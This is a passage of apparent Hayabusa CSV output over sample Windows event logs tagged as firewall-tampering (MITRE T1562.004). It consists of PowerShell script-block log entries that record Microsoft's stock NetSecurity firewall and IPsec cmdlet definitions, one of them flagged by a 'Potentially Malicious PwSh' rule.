+2021-04-23 19:09:44.641 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.642 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.652 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.653 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.654 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.654 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.655 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.655 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.656 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.658 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.659 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.660 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.Contains",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 